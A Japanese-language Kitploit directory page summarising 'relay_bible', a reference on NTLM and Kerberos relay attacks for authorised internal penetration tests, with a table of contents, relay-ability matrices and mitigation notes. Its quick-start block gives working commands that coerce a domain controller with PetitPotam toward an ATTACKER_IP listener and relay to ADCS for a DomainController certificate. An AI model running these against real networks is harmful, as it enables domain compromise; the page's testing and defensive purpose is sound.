Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
relay_bible — 複数のリレー技術に関するテクニカルリファレンス | Kitploit
ツール/GitHubGitHub/rootsecdev/relay_bible
特権昇格偵察脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト認証学習と教育レッドチーミング厳選リソースラボと実践
GitHub
193223ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
rootsecdev/relay_bible

relay_bible

複数のリレー技術に関するテクニカルリファレンス

リポジトリを見る

Relay Bible — 内部ペネトレーションテスト用リレーガイド

認可された内部ペネトレーションテスト中におけるNTLMリレー攻撃の包括的なリファレンスです。認証の基礎、認証強制テクニック、プロトコル別のリレーターゲット、ツール、高度なチェイニング、防御策をカバーしています。

前提条件

  • Linux攻撃ホスト(Kali、Parrot、または類似のもの)
  • ImpacketがインストールされたPython 3.10以上
  • ターゲット環境へのネットワークアクセス(認可されたエンゲージメント)
  • Active DirectoryとWindowsネットワーキングの基礎知識

目次

1. 基礎

  • NTLM認証とリレーの理論 — NTLMの仕組み、リレーが可能な理由、NTLMv1とv2、署名、EPA
  • Kerberos認証とリレーの理論 — AS/TGS/AP交換、SPNの正規化、Kerberosが依然としてリレー可能な理由
  • リレーの機会の特定 — 列挙、署名なしのホストの発見、攻撃面のマッピング

2. 認証強制テクニック

  • 認証強制の概要 — マシンに自分のリスナーへの認証を強制する
  • PetitPotam (MS-EFSRPC)
  • PrinterBug / SpoolSample (MS-RPRN)
  • DFSCoerce (MS-DFSNM)
  • ShadowCoerce (MS-FSRVP)

3. リレーターゲット(プロトコル別)

  • SMBリレー — SMBへのリレーによるコード実行
  • LDAP / LDAPSリレー — アクセス委任、マシンアカウントの作成、RBCD
  • MSSQLリレー — SQL Serverへのリレーによるコマンド実行
  • HTTP / WebDAVリレー — Webエンドポイントへのリレー、WebDAVによる認証強制
  • ADCS攻撃(ESC1–ESC15) — リレーを含むすべてのADCS権限昇格テクニック
  • SMTP / IMAPリレー — Exchange/メールサービスへのリレー
  • RPC / DCOMリレー — RPCエンドポイントへのリレー
  • SOCKSプロキシリレー — SOCKS経由で持続的なリレーセッションを維持する

4. ツールのセットアップと使用方法

  • Responder — ポイズニングとハッシュの取得
  • ntlmrelayx.py — 主要なリレーフレームワーク
  • mitm6 — 認証強制のためのIPv6 DNS乗っ取り
  • Certipy — ADCSの列挙とリレー
  • Coercer — 自動化された認証強制ツール
  • krbrelayx — Kerberosリレーと委任の悪用

5. 高度なテクニック

  • クロスプロトコルリレー — あるプロトコルから別のプロトコルへのリレー
  • IPv6攻撃チェーン — mitm6 + リレーの組み合わせ
  • リレーチェイニングとピボット — マルチホップリレーシナリオ
  • WebDAV認証強制トリック — マシンからのHTTP認証の強制
  • DNS CNAME悪用によるKerberosリレー — Cymulate / CVE-2026-20929、CNAMEポイズニングによるKerberos TGSリレー

6. 防御と検知

  • 緩和策 — SMB署名、LDAP署名、EPA、NTLMの無効化
  • 検知 — ログソース、Sigmaルール、挙動インジケーター

クイックリファレンス: NTLMリレー — 何をどこにリレーできるか?

最新(CVE-2019-1040以後)のパッチ適用済み環境におけるクラシックなNTLMリレーに適用されます。より詳細なクロスプロトコルの内訳については、クロスプロトコルリレーを参照してください。

* ターゲットがSMB署名を要求しないこと † SMB由来のNTLMはNEGOTIATEに署名フラグを含んでおり、LDAPとADCS HTTPはこれを強制します — そのため、リレーされたセッションは攻撃者が保持していない署名キーを要求することになります。これが、LDAPおよびADCSリレーにおいてWebDAV/HTTP由来の認証が優先される理由です。

クイックリファレンス: DNS CNAME悪用によるKerberosリレー

Cymulate / CVE-2026-20929プリミティブ(2026年1月) — 攻撃者がCNAMEでDNSをポイズニングし、WindowsがSPNを正規化し、クライアントが攻撃者の選択したターゲット向けのTGSを要求し、AP-REQがリレーされます。多くのサービスがSPNのDNS部分のみに基づいてチケットを受け入れるため、ソースSPNのクラスはNTLMリレーほど重要ではありません — 攻撃を制限するのは、ターゲットサービスが独自のアンチリレー制御を強制するかどうかです。

すべての行は、攻撃者がDNSをポイズニングできるネットワーク上の位置(mitm6経由のDHCPv6、ARP、不正DHCPv4)にいることを前提としています。完全なテクニック: DNS CNAME悪用によるKerberosリレー。

クイックスタート

  1. 列挙 — 署名が無効なホストを探し、認証強制ターゲットを特定する
  2. 配置 — ターゲットを向いたリレーリスナー(ntlmrelayx)を起動する
  3. 強制 — ソースマシンから自分のリスナーへの認証をトリガーする
  4. 成果 — リレーが認証を捕捉し、ターゲットプロトコルへ転送する
root@kitploit:~
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
ツールをダウンロード
ソース認証→ SMB→ LDAP→ MSSQL→ HTTP→ ADCS→ SOCKS
SMB✅*❌†✅✅❌†✅
HTTP✅*✅✅✅✅✅
WebDAV✅*✅✅✅✅✅
MSSQL✅*✅✅✅✅✅
ターゲットサービスリレー可能、ただし...パッチ / ステータス
SMBターゲットでSMB署名が必須—
LDAPLDAP署名が必須—
LDAPSLdapEnforceChannelBinding = 2 (Always)—
HTTP / IISHTTP CBTが強制される(HTTP.sysトークンチェック = Require)CVE-2026-20929がHTTP.sys CBTをバックポート
ADCS /certsrv/vdirでExtended Protection = RequireHTTP.sys CBT(CVE-2026-20929経由)が適用
MSSQLExtended Protectionが有効—
Exchange (OWA/ECP/…)すべての仮想ディレクトリでEPA—